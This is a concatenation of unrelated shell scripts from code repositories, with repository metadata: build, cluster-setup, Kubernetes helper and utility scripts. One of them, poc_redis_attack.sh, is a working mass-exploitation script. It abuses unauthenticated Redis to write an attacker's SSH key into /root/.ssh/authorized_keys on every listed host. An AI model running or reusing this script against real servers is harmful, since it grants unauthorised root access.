counter=1
echo -e "\n\nselection=\$(get_selection)" >> "$OUTPUT"
for parameter in "$@"
do
    if [ "$counter" -gt 2 ]; then
        if [ "$counter" -eq 3 ]; then
            echo -e "if [ \"\$selection\" == \"$parameter\" ]; then" >> "$OUTPUT"
        elif [ $(( counter % 2 )) -ne 0 ]; then
            echo -e "elif [ \"\$selection\" == \"$parameter\" ]; then" >> "$OUTPUT"
        else
            echo -e " $parameter" >> "$OUTPUT"
        fi
    fi
    counter=$((counter+1))
done
echo "fi" >> "$OUTPUT"

chmod +x "$OUTPUT"
ln -s "$OUTPUT" "/usr/local/bin/dmenu-$FILENAME"   ## EDIT this to whatever you want
echo -e "the file $OUTPUT has been created its contents are:"
cat "$OUTPUT"
| true
|
d3d4ceddeced8c05a8b6d9122351bc33ea652aec
|
Shell
|
singleghost/redis-database-POC
|
/poc_redis_attack.sh
|
UTF-8
| 474
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Proof-of-concept for the classic unauthenticated-Redis write attack:
# for each host in the input file, store the contents of foo.txt under a
# key, repoint Redis' persistence directory to /root/.ssh/ and its dump
# file name to authorized_keys, then SAVE so the payload is written
# there. Hosts where every step reports OK are appended to vul_host.lst.
# NOTE(review): "read -p" does not interpret "\n"; the prompt shows the
# literal backslash-n.
read -p "enter the filename which contains urls\n" urlfile
cat $urlfile | while read line
do
# Each step is chained with && so the host is only recorded if the key
# write, both config changes, and the SAVE all succeed.
cat foo.txt |redis-cli -h $line -x set crackit \
&& redis-cli -h $line config set dir /root/.ssh/ |grep OK \
&& redis-cli -h $line config get dir|grep '/root/.ssh' \
&& redis-cli -h $line config set dbfilename \
"authorized_keys" | grep OK && redis-cli -h $line save \
| grep OK && echo "$line is OK" && echo $line >> vul_host.lst
done
echo "program exit"
|
483bcaacbbd1eb90fe85c681802cf0456d7cb1f5
|
Shell
|
brandonpaiz/dots
|
/scripts/,repeat-every
|
UTF-8
| 199
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Usage: ,repeat-every INTERVAL COMMAND [ARGS...]
# Run COMMAND forever, sleeping INTERVAL between runs. Exits with an
# error when sleep rejects INTERVAL.
#
# Fix over the original: the error path called sleep_error_msg "$@",
# which printed the repeated command instead of the offending interval;
# it now passes "$sleep_time".
sleep_error_msg() {
echo "$0: invalid time interval '$1'"
}
sleep_time="$1"
shift 1
while true
do
"$@"
sleep "$sleep_time" &>/dev/null || { sleep_error_msg "$sleep_time" && exit 1; }
done
| true
|
69a17c40959c9329b7cfcb2eda11e5a314f83375
|
Shell
|
mischief/9problems
|
/sys/src/games/music/juke.rc
|
UTF-8
| 1,147
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/rc
# juke.rc - Plan 9 jukebox launcher: ensure playlistfs and jukefs are
# mounted (importing /srv from a remote host when -h is given), then
# exec the jukebox UI. Written in rc, not POSIX shell.
rfork e
# Use the text (-t) layout automatically on narrow displays (<= 240 px).
wide=`{echo $vgasize | sed 's/(.*)x.*x.*/\1 > 240/' | hoc}
debug=0
tflag=''
wflag=''
host=''
flags=()
sname=$user
if (! ~ $wide 1) {
flags=($flags -t)
}
# Minimal option parsing: -d level, -t text mode, -h srvhost, -w, -s name.
while(! ~ $#* 0) {
switch ($1) {
case -d
debug=$2
shift
case -t
tflag='-t'
case -h
host=$2
shift
case -w
wflags='-w'
case -s
sname=$2
shift
case -*
echo Usage: classical [-d level] [-t] [-h srvhost]
exit usage
}
shift
}
# Mount playlistfs (starting it if its /srv post does not exist yet).
if (! test -f /mnt/playlist) {
if (! ~ $debug '0') echo mounting playlistfs
if (! test -e /srv/playlist.$sname && ! ~ $host ''){
import -a $host /srv /srv
}
if (! mount -b /srv/playlist.$sname /mnt >/dev/null >[2]/dev/null){
rm -f /srv/playlist.$sname
if (! ~ $debug '0') echo starting playlistfs
games/playlistfs -s $sname -d $debug
}
}
# Mount jukefs the same way if /mnt/juke is empty.
if (~ `{ls /mnt/juke >[2]/dev/null | sed '1q'} '') {
if (! test -e /srv/jukefs.$sname && ! ~ $host ''){
import -a $host /srv /srv
}
if (! mount -b /srv/jukefs.$sname /mnt >/dev/null >[2]/dev/null){
if (! ~ $debug '0') echo games/jukefs
games/jukefs -s $sname
}
}
# Launch the UI; with -w an extra backgrounded instance is started first.
if (~ $wflags '-w') {
exec games/jukebox -w -d $debug $tflag &
}
exec games/jukebox -d $debug $tflag
| true
|
a4dabf817a17b39fd8fa3a36224e758adaec7633
|
Shell
|
yochananmarqos/pkgbuilds
|
/mangl-git/PKGBUILD
|
UTF-8
| 1,396
| 2.6875
| 3
|
[] |
no_license
|
# https://aur.archlinux.org/packages/mangl-git
# PKGBUILD for the mangl graphical man page viewer, built from git HEAD
# (pkgver derived from git describe). Sourced by makepkg.
groups=('modified')
pkgname=mangl-git
pkgver=1.1.2.r1.g1957140
pkgrel=1
pkgdesc="Graphical man page viewer"
arch=('x86_64')
url="https://github.com/zigalenarcic/mangl"
license=('BSD')
depends=('freetype2' 'glfw' 'libglvnd')
makedepends=('git')
makedepends+=('glfw-x11')
#makedepends+=('glfw-wayland')
optdepends=('fontconfig: set custom font')
provides=("${pkgname%-git}")
conflicts=("${pkgname%-git}")
source=('git+https://github.com/zigalenarcic/mangl.git'
"${pkgname%-git}.desktop"
'manglrc_example')
sha256sums=('SKIP'
'370e454df24a2bf0bf185988d92083c0ec5bd72548a5fba9c44867e76a1d8d91'
'527eb963486647d759f3884beff0acb24424a93b02d285008d475bcb26534e80')
# Derive "tag.rN.ghash" style version from the checked-out git tree.
pkgver() {
cd "$srcdir/${pkgname%-git}"
git describe --long --tags | sed 's/^v//;s/\([^-]*-g\)/r\1/;s/-/./g'
}
build() {
cd "$srcdir/${pkgname%-git}"
./configure
make
}
# Manual install: upstream's 'make install' is bypassed in favor of
# explicit install(1) calls for binary, man page, desktop file, example
# config and license.
package() {
cd "$srcdir/${pkgname%-git}"
# make PREFIX=/usr DESTDIR="$pkgdir" install
install -Dm755 "${pkgname%-git}" -t "$pkgdir/usr/bin/"
install -Dm644 "${pkgname%-git}.1" -t "$pkgdir/usr/share/man/man1/"
install -Dm644 "$srcdir/${pkgname%-git}.desktop" -t "$pkgdir/usr/share/applications/"
install -Dm644 "$srcdir/manglrc_example" -t "$pkgdir/usr/share/doc/${pkgname%-git}/"
install -Dm644 LICENSE -t "$pkgdir/usr/share/licenses/${pkgname%-git}/"
}
| true
|
d231865bf7333768171a71c1f1096d1197444910
|
Shell
|
gperciva/lilypond-extra
|
/stats/make-stats.sh
|
UTF-8
| 913
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/sh
# Generate gitstats reports for the LilyPond repository over three time
# windows (last year, last 3 months, full history) and publish each report
# via rsync. Requires $LILYPOND_GIT to point at a checkout of the repo.
#
# Refactor: the three identical gitstats/ln/rsync sequences are collapsed
# into one helper, so a change to the publishing steps happens in one place.
TMPDIR=~/tmp/
GITSTATS=~/src/gitstats/gitstats

ONE_YEAR=$TMPDIR/stats-1year/
THREE_MONTHS=$TMPDIR/stats-3months/
ALL=$TMPDIR/stats-all/

SERVER_ONE_YEAR=graham@lilypond.org:public_html/gitstats-1year/
SERVER_THREE_MONTHS=graham@lilypond.org:public_html/gitstats-3months/
SERVER_ALL=graham@lilypond.org:public_html/gitstats-all/

# make_stats OUTDIR DEST [SINCE]
#   Run gitstats over $LILYPOND_GIT (restricted to commits newer than SINCE
#   when given), alias authors.html as AUTHORS.html, rsync the report to DEST.
make_stats() {
    outdir=$1
    dest=$2
    since=$3
    mkdir -p "$outdir"
    cd "$LILYPOND_GIT" || exit 1
    if [ -n "$since" ]; then
        $GITSTATS \
            -c commit_begin=$(git rev-list -1 --until="$since" origin) \
            "$LILYPOND_GIT" "$outdir"
    else
        $GITSTATS "$LILYPOND_GIT" "$outdir"
    fi
    cd "$outdir" || exit 1
    ln -s authors.html AUTHORS.html
    rsync -a "$outdir"/* "$dest"/
}

make_stats "$ONE_YEAR"     "$SERVER_ONE_YEAR"     "1 year ago"
make_stats "$THREE_MONTHS" "$SERVER_THREE_MONTHS" "3 months ago"
make_stats "$ALL"          "$SERVER_ALL"          ""
| true
|
1bbe22d01e3c6bbd0d2d24fb48cf19d6d54702ad
|
Shell
|
bestofmukul/aquabot
|
/build.sh
|
UTF-8
| 131
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Cross-compile a Go package for linux/arm (ARMv7).
#
# Usage: ./build.sh <path-to-package>
if [[ -z $1 ]]; then
    echo "Please provide a path to build"
    exit 1
fi
# Quote the path so directories containing spaces survive word-splitting.
GOARM=7 GOARCH=arm GOOS=linux go build "$1"
| true
|
ad7eab946c15eb6df7cfb46cb1bba745a8da2ed9
|
Shell
|
aiotter/dotfiles
|
/bin/makedoc
|
UTF-8
| 413
| 2.609375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Build .pdf / .docx output from .adoc sources via an inline Makefile.
#
# Bug fix: the heredoc delimiter is now quoted ('END-OF-MAKEFILE') so make's
# automatic variables ($@, $<) reach make literally — previously the shell
# expanded $@ to this script's own arguments inside the recipes, corrupting
# them. Recipe lines are also TAB-indented as make requires.
make -f <(cat << 'END-OF-MAKEFILE'
%.pdf: %.adoc
	asciidoctor-pdf -r asciidoctor-pdf-cjk --out-file $@ $<

%.docx: %.adoc custom-reference.docx
	asciidoctor --backend docbook --out-file - $< | pandoc --from docbook --to docx --reference-doc=custom-reference.docx --output $@

custom-reference.docx:
	pandoc --print-default-data-file reference.docx > custom-reference.docx
END-OF-MAKEFILE
) "$@"
| true
|
36b9b9eb4fc76a199431941742c1106805722e36
|
Shell
|
phisikus/hecuba
|
/cluster/createNodeDirs.sh
|
UTF-8
| 1,090
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# Create $1 local Cassandra node directories under ./nodes. Each node shares
# the ./apache-cassandra installation through symlinks but gets a private
# conf/ copy (with per-node cassandra.yaml) and an empty data/ directory.
if [ ! -d apache-cassandra ]
then
    echo "apache-cassandra directory is missing"
    exit -1
fi
if [ $# -lt 1 ]
then
    echo "use number of nodes as argument"
    exit -1
fi
if [ $1 -lt 1 ]
then
    echo "use a number greater than 0"
    exit -1
fi
numberOfNodes=$1
rm -fr nodes
mkdir nodes
# Seed list: one address per node, 192.168.43.10, .11, ...
seeds="192.168.43.10"
for ((k=1; k<numberOfNodes; k++))
do
    seeds=$seeds",192.168.43.$(($k+10))"
done
echo "I will create $numberOfNodes nodes..."
for ((i=0; i<numberOfNodes; i++))
do
    mkdir -p nodes/node_$i/apache-cassandra/
    # Symlink every entry of the shared installation into the node dir...
    for j in ./apache-cassandra/*
    do
        ln -s ../../../$j ./nodes/node_$i/$j
    done
    # ...then replace the conf/data links with per-node copies.
    rm ./nodes/node_$i/apache-cassandra/conf
    rm ./nodes/node_$i/apache-cassandra/data
    mkdir ./nodes/node_$i/apache-cassandra/data
    cp -r ./apache-cassandra/conf ./nodes/node_$i/apache-cassandra/
    # Rewrite cluster name, seed list and listen address for this node.
    cat ./apache-cassandra/conf/cassandra.yaml | sed \
    -e "s/Test Cluster/HecubaCluster/g" \
    -e "s/127.0.0.1/$seeds/g" \
    -e "s/localhost/192.168.43.$(($i+10))/g" > ./nodes/node_$i/apache-cassandra/conf/cassandra.yaml
    echo "Created directory and configuration for node $i"
done
echo "Done."
| true
|
e2c1d73df24313394c25b42b6840c9078dff8ee8
|
Shell
|
kathra-project/deployment
|
/terraform/terraform_modules/minikube-stack/sh/functions.sh
|
UTF-8
| 14,034
| 3.375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Shared helper functions for the KATHRA minikube stack installer.
# $tmp is the scratch directory for downloads and rendered configs; callers
# may pre-set it to override the default location.
[ "$tmp" == "" ] && export tmp=/tmp/kathra.minikube.wrapper
[ ! -d $tmp ] && mkdir $tmp
# Start (or reuse) a local minikube cluster sized by the minikubeCpus /
# minikubeMemory / minikubeDiskSize globals, enable the ingress addon and
# install the default TLS certificate for it.
function startMinikube() {
    printDebug "startMinikube(minikubeCpus: $minikubeCpus, minikubeMemory: $minikubeMemory, minikubeDiskSize: $minikubeDiskSize)"
    downloadMinikube
    installKubectl
    # Already running with kubectl correctly configured -> just ensure ingress.
    [ $(minikube status | grep -e "host: Running\|kubelet: Running\|apiserver: Running\|kubectl: Correctly Configured\|kubeconfig: Configured" | wc -l) -eq 4 ] && minikube addons enable ingress && printInfo "Minikube already started" && return 0
    if [ "$minikubeVmDriver" == "none" ]
    then
        # Driver "none" runs as root: move the generated kube config back
        # into the invoking user's home and fix ownership/paths.
        $sudo minikube start --vm-driver="none" --kubernetes-version v$kubernetesVersion || printErrorAndExit "Unable to install minikube"
        rm -Rf $HOME/.minikube $HOME/.kube
        $sudo mv /root/.kube /root/.minikube $HOME
        $sudo chown -R $USER $HOME/.kube $HOME/.minikube
        sudo chown -R $USER /etc/kubernetes
        sed -i "s#/root/#${HOME}/#g" $HOME/.kube/config
    else
        minikube start --vm-driver=$minikubeVmDriver --cpus $minikubeCpus --memory $minikubeMemory --disk-size $minikubeDiskSize --kubernetes-version v$kubernetesVersion || printErrorAndExit "Unable to install minikube"
    fi
    printInfo "Minikubed started"
    minikube addons enable ingress || printErrorAndExit "Unable to enable ingress"
    addDefaultCertNginxController "kathra-services" "default-tls" || printErrorAndExit "Unable to Configure Nginx"
    return 0
}
export -f startMinikube
function getLocalIp() {
    # Resolve the host's primary (first non-loopback) IPv4 address.
    # Prints the address on stdout; returns 1 when none could be found.
    local nic
    nic=$(ip -4 addr show | grep '^[0-9]*:' | awk '{print $2;}' | sed 's/\://g' | grep -v 'lo' | head -n 1)
    local addr
    addr=$(ip -4 addr show $nic | grep -oP '(?<=inet\s)[\da-f.]+')
    [ "$addr" == "" ] && return 1
    echo $addr
}
# Patch the nginx ingress controller deployment so it serves the given
# secret ($2, in namespace $1) as its default SSL certificate.
function addDefaultCertNginxController() {
    local namespace=$1
    local secretName=$2
    kubectl -n kube-system patch deployment nginx-ingress-controller -o json --type "json" -p "[{\"op\":\"add\",\"path\":\"/spec/template/spec/containers/0/args/1\",\"value\":\"--default-ssl-certificate=$namespace/$secretName\"}]"
}
# Register the host's local IP in CoreDNS for the given domain.
# Accepts the domain as $1, falling back to the global $domain for backward
# compatibility. Bug fix: the original logged $1 but always used the global,
# silently ignoring the argument; it also resolved the local IP twice.
function addLocalIpInCoreDNS() {
    local dnsDomain="${1:-$domain}"
    printDebug "addLocalIpInCoreDNS(domain: $dnsDomain)"
    local localIp
    localIp="$(getLocalIp)"
    [ "$localIp" == "" ] && return 1
    coreDnsAddRecords "$dnsDomain" "$localIp"
}
# Emit a JSON object {cluster_ca_certificate, host, client_certificate,
# client_key} for the minikube / docker-desktop cluster, certificates as
# base64, suitable for the terraform kubernetes provider.
function getKubeConfig() {
    printDebug "getKubeConfig()"
    # CA certificate: prefer inline *-data, otherwise read the referenced file.
    local ca_data=$(kubectl config view --raw -o json | jq -r '.clusters[] | select((.name=="minikube") or (.name=="docker-desktop")) | .cluster."certificate-authority-data"')
    if [ "$ca_data" == "null" ]
    then
        local ca_file=$(kubectl config view --raw -o json | jq -r '.clusters[] | select((.name=="minikube") or (.name=="docker-desktop")) | .cluster."certificate-authority"')
        [ ! -f "$ca_file" ] && printErrorAndExit "Unable to find certificate-authority in kubectl config view"
        ca_data=$(cat $ca_file | base64 -w0)
    fi
    local host=$(kubectl config view --raw -o json | jq -r '.clusters[] | select((.name=="minikube") or (.name=="docker-desktop")) | .cluster.server')
    # Client certificate: same inline-or-file fallback.
    local client_cert_data=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-certificate-data"')
    if [ "$client_cert_data" == "null" ]
    then
        local client_cert_file=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-certificate"')
        [ ! -f "$client_cert_file" ] && printErrorAndExit "Unable to find client-certificate in kubectl config view"
        client_cert_data=$(cat $client_cert_file | base64 -w0)
    fi
    # Client key: same fallback again.
    local client_key_data=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-key-data"')
    if [ "$client_key_data" == "null" ]
    then
        local client_key_file=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-key"')
        [ ! -f "$client_key_file" ] && printErrorAndExit "Unable to find client-key in kubectl config view"
        client_key_data=$(cat $client_key_file | base64 -w0)
    fi
    echo "{\"cluster_ca_certificate\": \"$(echo $ca_data)\", \"host\":\"$host\", \"client_certificate\":\"$(echo $client_cert_data)\", \"client_key\":\"$(echo $client_key_data)\"}"
}
function checkCommandAndRetry() {
    # Re-evaluate the command string in $1 until it succeeds, up to 100
    # attempts spaced 5 seconds apart.
    # Returns 0 on success, 1 once the retry budget is exhausted.
    local retrySecondInterval=5
    local attempt_counter=0
    local max_attempts=100
    until eval "${1}"; do
        [ ${attempt_counter} -eq ${max_attempts} ] && printError "Check $1, error" && return 1
        attempt_counter=$(($attempt_counter+1))
        printDebug "Check : $1, attempt ($attempt_counter/$max_attempts), retry in $retrySecondInterval sec."
        sleep $retrySecondInterval
    done
    return 0
}
export -f checkCommandAndRetry
# Install the KubeDB operator chart (version $kubeDbVersion) via helm,
# skipping when a release named kubedb-operator already exists.
function installKubeDB() {
    printDebug "installKubeDB()"
    local nameRelease=kubedb-operator
    [ ! "$(helm list --output json | jq -r ".Releases[] | select(.Name==\"$nameRelease\")")" == "" ] && printDebug "KubeDB already installed" && return 0
    # onessl extracts the cluster CA needed by the webhook configuration.
    curl -fsSL -o onessl https://github.com/kubepack/onessl/releases/download/0.3.0/onessl-linux-amd64 && chmod +x onessl && sudo mv onessl /usr/local/bin/
    helm repo add appscode https://charts.appscode.com/stable/ || printErrorAndExit "Unable add helm repo"
    helm repo update || printErrorAndExit "Unable update helm repo"
    helm install appscode/kubedb --namespace kubedb --name $nameRelease --version $kubeDbVersion --set apiserver.ca="$(onessl get kube-ca)" --set apiserver.enableValidatingWebhook=true --set apiserver.enableMutatingWebhook=true || printErrorAndExit "Unable install kubedb"
    printInfo "KubeDB Installed"
    return 0
}
export -f installKubeDB

# Forward local TCP port $1 to $2:$3 through a background socat process,
# killing any previous forwarder bound to the same local port first.
function forwardPort() {
    local portLocal=$1
    local hostDist=$2
    local portDist=$3
    printDebug "forwardPort(portLocal: $portLocal, hostDist: $hostDist, portDist: $portDist)"
    ! dpkg -s socat > /dev/null && sudo apt-get install -y socat
    # Tear down an existing forwarder on the same port.
    ps a | grep "socat tcp-l:$portLocal," | grep -v grep | awk '{print $1}' | xargs sudo kill -9 > /dev/null 2> /dev/null
    nohup sudo socat tcp-l:$portLocal,fork,reuseaddr tcp:$hostDist:$portDist > /dev/null 2>&1 </dev/null &
    printInfo "localhost listen on port $portLocal and redirect to $hostDist:$portDist"
    return $?
}
export -f forwardPort

# Replace/append the /etc/hosts entry "$2 $1" (requires sudo).
function addEntryHostFile() {
    local domain=$1
    local ip=$2
    printDebug "addEntryHostFile(domain: $domain, ip: $ip)"
    # Drop any previous line ending with " $domain", then append the new entry.
    sudo grep -v " $domain$" < /etc/hosts > $tmp/addEntryHostFile && sudo cp $tmp/addEntryHostFile /etc/hosts
    echo "$ip $domain" | sudo tee -a /etc/hosts
}
export -f addEntryHostFile

# Install minikube v$minikubeVersion (plus driver prerequisites) when missing.
function downloadMinikube() {
    printDebug "downloadMinikube()"
    [ "${minikubeVmDriver}" == "virtualbox" ] && ! dpkg -s virtualbox > /dev/null && sudo apt-get install -y virtualbox
    [ "${minikubeVmDriver}" == "none" ] && ! dpkg -s nfs-common > /dev/null && sudo apt-get install -y nfs-common
    # Nothing to do when the binary is already on PATH.
    which minikube > /dev/null 2> /dev/null && return 0
    sudo curl -L -o $tmp/minikube https://storage.googleapis.com/minikube/releases/v$minikubeVersion/minikube-linux-amd64
    sudo chmod +x $tmp/minikube
    sudo mv $tmp/minikube /usr/local/bin/minikube
}
export -f downloadMinikube
# Add an A record (plus wildcard CNAME) for $1 -> $2 to the cluster CoreDNS:
# patch the coredns ConfigMap with a kathra.db zone file, mount it into the
# coredns deployment, restart the pods and verify in-cluster resolution.
function coreDnsAddRecords() {
    local domain=$1
    local ip=$2
    printDebug "coreDnsAddRecords(domain: $domain, ip: $ip)"
    ## Add or Patch kathra.db into Coredns ConfigMap
    kubectl -n kube-system get cm coredns -o json > $tmp/coredns.cm.json
    local configMap=$(kubectl -n kube-system get cm coredns -o json | jq -r '.data["kathra.db"]')
    [ "$configMap" == "null" ] || kubectl -n kube-system patch configmap coredns --type=json -p='[{"op": "remove", "path": "/data/kathra.db"}]'
    kubectl -n kube-system get cm coredns -o json > $tmp/coredns.cm.json
    cat > $tmp/kathra.db <<EOF
$domain. IN SOA sns.dns.icann.org. noc.dns.icann.org. 2015082541 7200 3600 1209600 3600
$domain. IN NS b.iana-servers.net.
$domain. IN NS a.iana-servers.net.
$domain. IN A $ip
*.$domain. IN CNAME $domain.
EOF
    # Inject the zone file into the ConfigMap and reference it in the Corefile.
    jq ".data += {\"kathra.db\": \"$(cat $tmp/kathra.db | sed ':a;N;$!ba;s/\n/\n/g')\"}" < $tmp/coredns.cm.json | sed "s/53 {/53 {\\\\n file \/etc\/coredns\/kathra.db $domain /g" > $tmp/coredns.cm.updated.json
    kubectl apply -f $tmp/coredns.cm.updated.json || printErrorAndExit "Unable to update coredns configmap: $tmp/coredns.cm.updated.json"
    ## Mount kathra.db into Coredns Deployment
    kubectl -n kube-system get deployment coredns -o json > $tmp/coredns.deployment.json
    if [ $(grep "kathra.db" < $tmp/coredns.deployment.json | wc -l) -eq 0 ]
    then
        jq ".spec.template.spec.volumes[0].configMap.items += [{\"key\": \"kathra.db\", \"path\": \"kathra.db\"}]" < $tmp/coredns.deployment.json > $tmp/coredns.deployment.updated.json
        kubectl apply -f $tmp/coredns.deployment.updated.json || printErrorAndExit "Unable to update coredns deployment: $tmp/coredns.deployment.updated.json"
    fi
    ## Force restart pods
    kubectl -n kube-system delete pods -l k8s-app=kube-dns
    ## Test DNS config
    printInfo "Check internal DNS $domain -> $ip"
    checkCommandAndRetry "kubectl delete pods check-dns ; kubectl run -it --rm --restart=Never --image=infoblox/dnstools:latest check-dns -- '-c' \"host $domain\" | tee | grep \"$domain has address $ip\" > /dev/null" || printErrorAndExit "Unable to run pod dnstools and check hostname"
    printInfo "CoreDNS Configured"
    return 0
}
export -f coreDnsAddRecords
# Replace traefik's default TLS certificate with the given fullchain ($1)
# and private key ($2) files, then bounce the traefik pods to pick it up.
function configureDefaultCertificate() {
    local tlsFullChainFile=$1
    local tlsKeyFile=$2
    printDebug "configureDefaultCertificate(tlsFullChainFile: $tlsFullChainFile, tlsKeyFile: $tlsKeyFile)"
    kubectl -n traefik patch secrets traefik-default-cert -p "{\"data\": {\"tls.crt\":\"$(sudo cat $tlsFullChainFile | base64 -w0)\",\"tls.key\":\"$(sudo cat $tlsKeyFile | base64 -w0)\"}}" || printErrorAndExit "Unable to patch secrets 'traefik-default-cert' "
    printInfo "Traefik default certificate updated from files (fullchain: $tlsFullChainFile, key:$tlsKeyFile)"
    kubectl -n traefik delete pods --all > /dev/null 2> /dev/null
    return 0
}
export -f configureDefaultCertificate

# Obtain (or reuse) a Let's Encrypt wildcard certificate for *.$1 via a
# manual DNS challenge; copy fullchain/key to $2 / $3 owned by $USER.
function generateCertsDnsChallenge() {
    printDebug "generateCertsDnsChallenge(domain: $1, tlsCertOut: $2, tlsKeyOut: $3)"
    local domain=$1
    local tlsCertOut=$2
    local tlsKeyOut=$3
    local email=contact@$domain
    # Reuse an existing letsencrypt archive for this domain when present.
    local directoryName=$(sudo ls -l /etc/letsencrypt/archive/ | awk '{print $9}' | grep -E "$domain(-[0-9]+)*" | tail -n 1)
    if [ ! $directoryName == "" ]
    then
        local certDir=/etc/letsencrypt/live/$directoryName
        export tlsCert=$certDir/fullchain.pem
        export tlsKey=$certDir/privkey.pem
        sudo ls -l $tlsCert > /dev/null 2> /dev/null && sudo ls -l $tlsKey > /dev/null 2> /dev/null && printInfo "Certificate already exists: $tlsCert, $tlsKey" && sudo cp $tlsCert $tlsCertOut && sudo cp $tlsKey $tlsKeyOut && sudo chown $USER $tlsKeyOut && sudo chown $USER $tlsCertOut && return 0
    fi
    printInfo "Generate new wildcard certificate for domain *.$domain with Let's Encrypt"
    # Install certbot prerequisites, clone certbot and run the manual DNS flow.
    ! dpkg -s python-minimal > /dev/null && sudo apt-get install -y python-minimal
    ! dpkg -s letsencrypt > /dev/null && sudo apt-get install -y letsencrypt
    ! dpkg -s git-core > /dev/null && sudo apt-get install -y git-core
    [ -d /opt/certbot ] && sudo rm -Rf /opt/certbot
    cd /opt && sudo git clone https://github.com/certbot/certbot.git && cd certbot && ./certbot-auto
    ./certbot-auto certonly --manual --preferred-challenges=dns --email=$email --agree-tos -d *.$domain || printErrorAndExit "Unable to generate certificate for domain *.$domain"
    local directoryName=$(sudo ls -l /etc/letsencrypt/archive/ | awk '{print $9}' | grep -E "$domain(-[0-9]+)*" | tail -n 1)
    local certDir=/etc/letsencrypt/live/$directoryName
    export tlsCert=$certDir/fullchain.pem
    export tlsKey=$certDir/privkey.pem
    sudo chmod +r -R $certDir
    sudo ls -l $tlsCert > /dev/null || printErrorAndExit "File $tlsCert not found"
    sudo ls -l $tlsKey > /dev/null || printErrorAndExit "File $tlsKey not found"
    printInfo "Certificate FullChain and PrivateKey generated: $tlsCert, $tlsKey"
    sudo cp $tlsCert $tlsCertOut
    sudo cp $tlsKey $tlsKeyOut
    sudo chown $USER $tlsCertOut
    sudo chown $USER $tlsKeyOut
    return 0
}
export -f generateCertsDnsChallenge

# Write the terraform variables file $1: domain, kubeconfig JSON, kathra
# image tag, plus TLS / ACME settings depending on the DNS-challenge mode.
function initTfVars() {
    local file=$1
    [ -f $file ] && rm $file
    echo "domain = \"$domain\"" >> $file
    echo "kube_config = $(getKubeConfig)" >> $file
    echo "kathra_version = \"$kathraImagesTag\"" >> $file
    [ $manualDnsChallenge -eq 1 ] && echo "tls_cert_filepath = \"$tmp/tls.cert\"" >> $file
    [ $manualDnsChallenge -eq 1 ] && echo "tls_key_filepath = \"$tmp/tls.key\"" >> $file
    [ $automaticDnsChallenge -eq 1 ] && echo "acme_provider = \"$acmeDnsProvider\"" >> $file
    [ $automaticDnsChallenge -eq 1 ] && echo "acme_config = ${acmeDnsConfig}" >> $file
}
export -f initTfVars
# Run `terraform init`, then retry `terraform apply` up to 5 times (10s
# apart) since some resources may not be ready on the first pass.
# Bug fix: the failure path printed "Check $1, error" although this function
# takes no arguments; the bogus message is removed.
function terraformInitAndApply() {
    terraform init || printErrorAndExit "Unable to init terraform"
    local retrySecondInterval=10
    local attempt_counter=0
    local max_attempts=5
    while true; do
        terraform apply -auto-approve && return 0
        printError "Terraform : Unable to apply, somes resources may be not ready, try again.. attempt ($attempt_counter/$max_attempts) "
        [ ${attempt_counter} -eq ${max_attempts} ] && printErrorAndExit "Unable to apply after several attempts"
        attempt_counter=$(($attempt_counter+1))
        sleep $retrySecondInterval
    done
}
export -f terraformInitAndApply
| true
|
581c9a152742b25a6a3436704d0f82d4a3941c6a
|
Shell
|
lukaszgryglicki/devstats
|
/prometheus/psql.sh
|
UTF-8
| 1,203
| 2.703125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Bootstrap the DevStats "prometheus" project database from GitHub archives.
# Holds the global sync lock for the whole run (released via the EXIT trap).
function finish {
    sync_unlock.sh
}
# Take the lock only once; $TRAP guards against re-entry.
if [ -z "$TRAP" ]
then
    sync_lock.sh || exit -1
    trap finish EXIT
    export TRAP=1
fi
set -o pipefail
# Start with fresh log/error files.
> errors.txt
> run.log
# Create the DB structure, import events since 2015 (new format) and the 2014
# history (old format), then re-run structure to add tables/indexes.
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 ./structure 2>>errors.txt | tee -a run.log || exit 1
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 ./gha2db 2015-01-01 0 today now 'prometheus' 2>>errors.txt | tee -a run.log || exit 2
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 GHA2DB_OLDFMT=1 GHA2DB_EXACT=1 ./gha2db 2014-01-06 0 2014-12-31 23 'prometheus/prometheus' 2>>errors.txt | tee -a run.log || exit 3
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 GHA2DB_MGETC=y GHA2DB_SKIPTABLE=1 GHA2DB_INDEX=1 ./structure 2>>errors.txt | tee -a run.log || exit 4
# Per-project setup: repo groups, scripts, affiliations and repo list.
./prometheus/setup_repo_groups.sh 2>>errors.txt | tee -a run.log || exit 5
./prometheus/setup_scripts.sh 2>>errors.txt | tee -a run.log || exit 6
./prometheus/import_affs.sh 2>>errors.txt | tee -a run.log || exit 7
./prometheus/get_repos.sh 2>>errors.txt | tee -a run.log || exit 8
echo "All done. You should run ./prometheus/reinit.sh script now."
| true
|
ebf22b62f40e031ebb8835042ccf9f08c14d7d13
|
Shell
|
Danilo7/DevOps-Php-MySQL-Tools
|
/php/php_xdebug.sh
|
UTF-8
| 658
| 3.390625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Simple script to enable or disable the xdebug extension.
# Toggles the ini file in the PHP conf.d directory and signals PID 1 (the
# PHP-FPM master in a docker container) with USR2 to reload configuration.
#
# Fixes: removed leftover debug output (echo 'haha' / 'ehe'), deduplicated
# the ini path into a constant, and used the standard env shebang location.
